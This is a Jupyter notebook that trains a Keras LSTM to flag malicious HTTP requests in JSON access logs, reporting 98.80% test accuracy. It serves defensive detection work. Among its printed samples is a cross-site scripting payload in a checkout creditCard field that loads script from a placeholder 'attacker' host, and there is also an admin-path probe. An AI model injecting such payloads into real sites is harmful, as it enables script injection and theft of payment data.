In [1]:
import sys
import os
import json
import pandas
import numpy
import optparse
from keras.callbacks import TensorBoard
from keras.models import Sequential
from keras.layers import LSTM, Dense, Dropout
from keras.layers.embeddings import Embedding
from keras.preprocessing import sequence
from keras.preprocessing.text import Tokenizer
from collections import OrderedDict

Using TensorFlow backend.


In [2]:
dataframe = pandas.read_csv('./data/dev-access.csv', engine='python', quotechar='|', header=None)

In [3]:
dataframe.head(10)

Unnamed: 0,0,1
0,"{""timestamp"":1502738402847,""method"":""post"",""qu...",0
1,"{""timestamp"":1502738402849,""method"":""post"",""qu...",0
2,"{""timestamp"":1502738402852,""method"":""post"",""qu...",0
3,"{""timestamp"":1502738402852,""method"":""post"",""qu...",0
4,"{""timestamp"":1502738402853,""method"":""post"",""qu...",0
5,"{""timestamp"":1502738402853,""method"":""post"",""qu...",0
6,"{""timestamp"":1502738402854,""method"":""post"",""qu...",0
7,"{""timestamp"":1502738402855,""method"":""post"",""qu...",0
8,"{""timestamp"":1502738402856,""method"":""post"",""qu...",0
9,"{""timestamp"":1502738402856,""method"":""post"",""qu...",0


In [4]:
dataset = dataframe.sample(frac=1).values

In [6]:
dataset

array([[ '{"timestamp":1502738457546,"method":"get","query":{"query":"gurab"},"path":"/search","statusCode":404,"source":{"remoteAddress":"71.50.161.224"},"route":"/search","headers":{"host":"localhost:8002","connection":"keep-alive","cache-control":"no-cache","accept":"*/*","accept-encoding":"gzip, deflate, br","accept-language":"en-US,en;q=0.8,es;q=0.6"},"requestPayload":null,"responsePayload":{"statusCode":404,"error":"Not Found","message":"Not Found"}}',
        0],
       [ '{"timestamp":1502738433086,"method":"get","query":{"query":"zopup"},"path":"/search","statusCode":404,"source":{"remoteAddress":"133.73.53.176","referer":"http://localhost:8002/enter"},"route":"/search","headers":{"host":"localhost:8002","accept-language":"en-us","accept-encoding":"gzip, deflate","connection":"keep-alive","accept":"*/*","referer":"http://localhost:8002/enter","cache-control":"no-cache","x-requested-with":"XMLHttpRequest"},"requestPayload":null,"responsePayload":{"statusCode":404,"error":"Not F

In [8]:
# Preprocess dataset
X = dataset[:,0]
Y = dataset[:,1]

In [9]:
X

array([ '{"timestamp":1502738457546,"method":"get","query":{"query":"gurab"},"path":"/search","statusCode":404,"source":{"remoteAddress":"71.50.161.224"},"route":"/search","headers":{"host":"localhost:8002","connection":"keep-alive","cache-control":"no-cache","accept":"*/*","accept-encoding":"gzip, deflate, br","accept-language":"en-US,en;q=0.8,es;q=0.6"},"requestPayload":null,"responsePayload":{"statusCode":404,"error":"Not Found","message":"Not Found"}}',
       '{"timestamp":1502738433086,"method":"get","query":{"query":"zopup"},"path":"/search","statusCode":404,"source":{"remoteAddress":"133.73.53.176","referer":"http://localhost:8002/enter"},"route":"/search","headers":{"host":"localhost:8002","accept-language":"en-us","accept-encoding":"gzip, deflate","connection":"keep-alive","accept":"*/*","referer":"http://localhost:8002/enter","cache-control":"no-cache","x-requested-with":"XMLHttpRequest"},"requestPayload":null,"responsePayload":{"statusCode":404,"error":"Not Found","message"

In [10]:
Y

array([0, 0, 1, ..., 1, 0, 0], dtype=object)

In [11]:
for index, item in enumerate(X):
        # Quick hack to space out json elements
        reqJson = json.loads(item, object_pairs_hook=OrderedDict)
        del reqJson['timestamp']
        del reqJson['headers']
        del reqJson['source']
        del reqJson['route']
        del reqJson['responsePayload']
        X[index] = json.dumps(reqJson, separators=(',', ':'))

In [12]:
X

array([ '{"method":"get","query":{"query":"gurab"},"path":"/search","statusCode":404,"requestPayload":null}',
       '{"method":"get","query":{"query":"zopup"},"path":"/search","statusCode":404,"requestPayload":null}',
       '{"method":"post","query":{},"path":"/checkout","statusCode":400,"requestPayload":{"creditCard":"<script src=\\"http://attacker/malicious\\u2011script.js\\"></script>"}}',
       ...,
       '{"method":"get","query":{},"path":"/administrator/admin/","statusCode":404,"requestPayload":null}',
       '{"method":"get","query":{"query":"Slippers"},"path":"/search","statusCode":200,"requestPayload":null}',
       '{"method":"get","query":{"query":"Men\'s"},"path":"/search","statusCode":200,"requestPayload":null}'], dtype=object)

In [14]:
tokenizer = Tokenizer(filters='\t\n', char_level=True)
tokenizer.fit_on_texts(X)

In [15]:
# Extract and save word dictionary
word_dict_file = 'build/word-dictionary.json'

if not os.path.exists(os.path.dirname(word_dict_file)):
    os.makedirs(os.path.dirname(word_dict_file))

with open(word_dict_file, 'w') as outfile:
    json.dump(tokenizer.word_index, outfile, ensure_ascii=False)

In [16]:
num_words = len(tokenizer.word_index)+1
X = tokenizer.texts_to_sequences(X)

max_log_length = 1024
train_size = int(len(dataset) * .75)

In [17]:
X_processed = sequence.pad_sequences(X, maxlen=max_log_length)
X_train, X_test = X_processed[0:train_size], X_processed[train_size:len(X_processed)]
Y_train, Y_test = Y[0:train_size], Y[train_size:len(Y)]

In [18]:
tb_callback = TensorBoard(log_dir='./logs', embeddings_freq=1)

In [19]:
model = Sequential()
model.add(Embedding(num_words, 32, input_length=max_log_length))
model.add(Dropout(0.5))
model.add(LSTM(64, recurrent_dropout=0.5))
model.add(Dropout(0.5))
model.add(Dense(1, activation='sigmoid'))
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])

In [20]:
print(model.summary())

_________________________________________________________________
Layer (type)                 Output Shape              Param #   
embedding_1 (Embedding)      (None, 1024, 32)          2816      
_________________________________________________________________
dropout_1 (Dropout)          (None, 1024, 32)          0         
_________________________________________________________________
lstm_1 (LSTM)                (None, 64)                24832     
_________________________________________________________________
dropout_2 (Dropout)          (None, 64)                0         
_________________________________________________________________
dense_1 (Dense)              (None, 1)                 65        
Total params: 27,713
Trainable params: 27,713
Non-trainable params: 0
_________________________________________________________________
None


In [21]:
model.fit(X_train, Y_train, validation_split=0.25, epochs=3, batch_size=128, callbacks=[tb_callback])

Train on 15059 samples, validate on 5020 samples
Epoch 1/3
Epoch 2/3
Epoch 3/3


<keras.callbacks.History at 0x105bc9750>

In [22]:
# Evaluate model
score, acc = model.evaluate(X_test, Y_test, verbose=1, batch_size=128)
print("Model Accuracy: {:0.2f}%".format(acc * 100))

Model Accuracy: 98.80%


In [23]:
# Save model
model.save_weights('securitai-lstm-weights.h5')
model.save('securitai-lstm-model.h5')
with open('securitai-lstm-model.json', 'w') as outfile:
    outfile.write(model.to_json())